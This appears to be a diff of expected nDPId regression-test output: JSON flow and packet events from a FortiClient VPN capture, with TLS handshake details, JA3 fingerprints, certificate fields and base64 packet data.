{"version":"TLSv1.2","client_requested_server_name":"82.81.46.13","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"0debd3853f330c574b05e0b6d882dc27","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384"}} -01399{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":7,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1621067203571,"flow_last_seen":1621067203854,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":2620,"flow_avg_l4_payload_len":374,"midstream":0,"thread_ts_msec":1621067203854,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"82.81.46.13","src_port":61805,"dst_port":10443,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.FortiClient","breed":"Safe","category":"VPN"},"tls": {"version":"TLSv1.2","client_requested_server_name":"82.81.46.13","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"0debd3853f330c574b05e0b6d882dc27","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, ST=California, L=Sunnyvale, O=Fortinet, OU=Certificate Authority, CN=support","subjectDN":"C=US, ST=California, L=Sunnyvale, O=Fortinet, OU=FortiGate, CN=FWF60E4Q16012050","fingerprint":"AA:8A:CE:95:99:2A:E0:A4:11:42:E4:C8:40:D7:DB:87:1F:4A:23:45"}} +01064{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1621067203571,"flow_last_seen":1621067203776,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":171,"flow_tot_l4_payload_len":171,"flow_avg_l4_payload_len":42,"midstream":0,"thread_ts_msec":1621067203776,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"82.81.46.13","src_port":61805,"dst_port":10443,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"82.81.46.13","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +01121{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1621067203571,"flow_last_seen":1621067203852,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1611,"flow_avg_l4_payload_len":268,"midstream":0,"thread_ts_msec":1621067203852,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"82.81.46.13","src_port":61805,"dst_port":10443,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"82.81.46.13","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"0debd3853f330c574b05e0b6d882dc27","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384"}} +01399{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":7,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1621067203571,"flow_last_seen":1621067203854,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":2620,"flow_avg_l4_payload_len":374,"midstream":0,"thread_ts_msec":1621067203854,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"82.81.46.13","src_port":61805,"dst_port":10443,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.FortiClient","breed":"Safe","category":"VPN"},"tls": {"version":"TLSv1.2","client_requested_server_name":"82.81.46.13","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"0debd3853f330c574b05e0b6d882dc27","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, ST=California, L=Sunnyvale, O=Fortinet, OU=Certificate Authority, CN=support","subjectDN":"C=US, ST=California, L=Sunnyvale, O=Fortinet, OU=FortiGate, CN=FWF60E4Q16012050","fingerprint":"AA:8A:CE:95:99:2A:E0:A4:11:42:E4:C8:40:D7:DB:87:1F:4A:23:45"}} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":21,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621067204622,"flow_last_seen":1621067204622,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1621067204622,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"82.81.46.13","src_port":61806,"dst_port":10443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":21,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1621067204622,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1621067204622,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAG9\/\/AqAGyUlEuDfFuKMux1NwAAAAAALAC\/\/\/kHgAAAgQFtAEDAwUBAQgKJ6dAbwAAAAAEAgAA"} 00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":22,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1621067204682,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1621067204682,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8DZFAADQG9nJSUS4NwKgBsijL8W6yVLN5sdTcAaASOEC\/ugAAAgQFrAQCCAoGP5ENJ6dAbwEDAwo="} 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":24,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1621067204682,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1621067204682,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAG+AvAqAGyUlEuDfFuKMux1NwBslSzeoAQECwWWwAAAQEICienQKoGP5EN"} -01085{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":25,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1621067204622,"flow_last_seen":1621067204827,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":203,"flow_tot_l4_payload_len":203,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1621067204827,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"82.81.46.13","src_port":61806,"dst_port":10443,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"3":"DPI (cache)"},"proto":"TLS.FortiClient","breed":"Safe","category":"VPN"},"tls": {"version":"TLSv1.2","client_requested_server_name":"82.81.46.13","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -01142{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":27,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1621067204622,"flow_last_seen":1621067204898,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1643,"flow_avg_l4_payload_len":273,"midstream":0,"thread_ts_msec":1621067204898,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"82.81.46.13","src_port":61806,"dst_port":10443,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"3":"DPI (cache)"},"proto":"TLS.FortiClient","breed":"Safe","category":"VPN"},"tls": {"version":"TLSv1.2","client_requested_server_name":"82.81.46.13","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"0debd3853f330c574b05e0b6d882dc27","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384"}} -01408{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":28,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1621067204622,"flow_last_seen":1621067204900,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":2652,"flow_avg_l4_payload_len":378,"midstream":0,"thread_ts_msec":1621067204900,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"82.81.46.13","src_port":61806,"dst_port":10443,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"3":"DPI (cache)"},"proto":"TLS.FortiClient","breed":"Safe","category":"VPN"},"tls": {"version":"TLSv1.2","client_requested_server_name":"82.81.46.13","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"0debd3853f330c574b05e0b6d882dc27","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, ST=California, L=Sunnyvale, O=Fortinet, OU=Certificate Authority, CN=support","subjectDN":"C=US, ST=California, L=Sunnyvale, O=Fortinet, OU=FortiGate, CN=FWF60E4Q16012050","fingerprint":"AA:8A:CE:95:99:2A:E0:A4:11:42:E4:C8:40:D7:DB:87:1F:4A:23:45"}} +01085{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":25,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1621067204622,"flow_last_seen":1621067204827,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":203,"flow_tot_l4_payload_len":203,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1621067204827,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"82.81.46.13","src_port":61806,"dst_port":10443,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"5":"DPI (cache)"},"proto":"TLS.FortiClient","breed":"Safe","category":"VPN"},"tls": {"version":"TLSv1.2","client_requested_server_name":"82.81.46.13","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +01142{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":27,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1621067204622,"flow_last_seen":1621067204898,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1643,"flow_avg_l4_payload_len":273,"midstream":0,"thread_ts_msec":1621067204898,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"82.81.46.13","src_port":61806,"dst_port":10443,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"5":"DPI (cache)"},"proto":"TLS.FortiClient","breed":"Safe","category":"VPN"},"tls": {"version":"TLSv1.2","client_requested_server_name":"82.81.46.13","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"0debd3853f330c574b05e0b6d882dc27","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384"}} +01408{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":28,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1621067204622,"flow_last_seen":1621067204900,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":2652,"flow_avg_l4_payload_len":378,"midstream":0,"thread_ts_msec":1621067204900,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"82.81.46.13","src_port":61806,"dst_port":10443,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"5":"DPI (cache)"},"proto":"TLS.FortiClient","breed":"Safe","category":"VPN"},"tls": {"version":"TLSv1.2","client_requested_server_name":"82.81.46.13","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"0debd3853f330c574b05e0b6d882dc27","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, ST=California, L=Sunnyvale, O=Fortinet, OU=Certificate Authority, CN=support","subjectDN":"C=US, ST=California, L=Sunnyvale, O=Fortinet, OU=FortiGate, CN=FWF60E4Q16012050","fingerprint":"AA:8A:CE:95:99:2A:E0:A4:11:42:E4:C8:40:D7:DB:87:1F:4A:23:45"}} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":46,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621067205651,"flow_last_seen":1621067205651,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1621067205651,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"82.81.46.13","src_port":61811,"dst_port":10443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":46,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1621067205651,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1621067205651,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAG9\/\/AqAGyUlEuDfFzKMsSeiBCAAAAALAC\/\/87PQAAAgQFtAEDAwUBAQgKJ6dEZQAAAAAEAgAA"} 00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":48,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1621067205710,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1621067205710,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8c5FAADQGkHJSUS4NwKgBsijL8XP7CfxqEnogQ6ASOECEzAAAAgQFrAQCCAoGP5FzJ6dEZQEDAwo="} 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":49,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1621067205710,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1621067205710,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAG+AvAqAGyUlEuDfFzKMsSeiBD+wn8a4AQECzbbQAAAQEICienRJ8GP5Fz"} -01085{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":50,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1621067205651,"flow_last_seen":1621067205856,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":203,"flow_tot_l4_payload_len":203,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1621067205856,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"82.81.46.13","src_port":61811,"dst_port":10443,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"3":"DPI (cache)"},"proto":"TLS.FortiClient","breed":"Safe","category":"VPN"},"tls": {"version":"TLSv1.2","client_requested_server_name":"82.81.46.13","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -01142{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":52,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1621067205651,"flow_last_seen":1621067205926,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1643,"flow_avg_l4_payload_len":273,"midstream":0,"thread_ts_msec":1621067205926,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"82.81.46.13","src_port":61811,"dst_port":10443,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"3":"DPI (cache)"},"proto":"TLS.FortiClient","breed":"Safe","category":"VPN"},"tls": {"version":"TLSv1.2","client_requested_server_name":"82.81.46.13","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"0debd3853f330c574b05e0b6d882dc27","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384"}} -01408{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":53,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1621067205651,"flow_last_seen":1621067205928,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":2652,"flow_avg_l4_payload_len":378,"midstream":0,"thread_ts_msec":1621067205928,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"82.81.46.13","src_port":61811,"dst_port":10443,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"3":"DPI (cache)"},"proto":"TLS.FortiClient","breed":"Safe","category":"VPN"},"tls": {"version":"TLSv1.2","client_requested_server_name":"82.81.46.13","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"0debd3853f330c574b05e0b6d882dc27","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, ST=California, L=Sunnyvale, O=Fortinet, OU=Certificate Authority, CN=support","subjectDN":"C=US, ST=California, L=Sunnyvale, O=Fortinet, OU=FortiGate, CN=FWF60E4Q16012050","fingerprint":"AA:8A:CE:95:99:2A:E0:A4:11:42:E4:C8:40:D7:DB:87:1F:4A:23:45"}} +01085{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":50,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1621067205651,"flow_last_seen":1621067205856,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":203,"flow_tot_l4_payload_len":203,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1621067205856,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"82.81.46.13","src_port":61811,"dst_port":10443,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"5":"DPI (cache)"},"proto":"TLS.FortiClient","breed":"Safe","category":"VPN"},"tls": {"version":"TLSv1.2","client_requested_server_name":"82.81.46.13","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +01142{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":52,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1621067205651,"flow_last_seen":1621067205926,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1643,"flow_avg_l4_payload_len":273,"midstream":0,"thread_ts_msec":1621067205926,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"82.81.46.13","src_port":61811,"dst_port":10443,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"5":"DPI (cache)"},"proto":"TLS.FortiClient","breed":"Safe","category":"VPN"},"tls": {"version":"TLSv1.2","client_requested_server_name":"82.81.46.13","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"0debd3853f330c574b05e0b6d882dc27","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384"}} +01408{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":53,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1621067205651,"flow_last_seen":1621067205928,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":2652,"flow_avg_l4_payload_len":378,"midstream":0,"thread_ts_msec":1621067205928,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"82.81.46.13","src_port":61811,"dst_port":10443,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"5":"DPI (cache)"},"proto":"TLS.FortiClient","breed":"Safe","category":"VPN"},"tls": {"version":"TLSv1.2","client_requested_server_name":"82.81.46.13","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"0debd3853f330c574b05e0b6d882dc27","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, ST=California, L=Sunnyvale, O=Fortinet, OU=Certificate Authority, CN=support","subjectDN":"C=US, ST=California, L=Sunnyvale, O=Fortinet, OU=FortiGate, CN=FWF60E4Q16012050","fingerprint":"AA:8A:CE:95:99:2A:E0:A4:11:42:E4:C8:40:D7:DB:87:1F:4A:23:45"}} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":71,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621067206773,"flow_last_seen":1621067206773,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1621067206773,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"82.81.46.13","src_port":61812,"dst_port":10443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":71,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1621067206773,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1621067206773,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAG9\/\/AqAGyUlEuDfF0KMspKYnJAAAAALAC\/\/+2swAAAgQFtAEDAwUBAQgKJ6dItwAAAAAEAgAA"} 00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":72,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1621067206833,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1621067206833,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA85JFAADQGH3JSUS4NwKgBsijL8XTNezJoKSmJyqASOED3YgAAAgQFrAQCCAoGP5HkJ6dItwEDAwo="} 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":73,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1621067206833,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1621067206833,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAG+AvAqAGyUlEuDfF0KMspKYnKzXsyaYAQECxOAgAAAQEICienSPMGP5Hk"} -01085{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":74,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1621067206773,"flow_last_seen":1621067206977,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":203,"flow_tot_l4_payload_len":203,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1621067206977,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"82.81.46.13","src_port":61812,"dst_port":10443,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"3":"DPI (cache)"},"proto":"TLS.FortiClient","breed":"Safe","category":"VPN"},"tls": 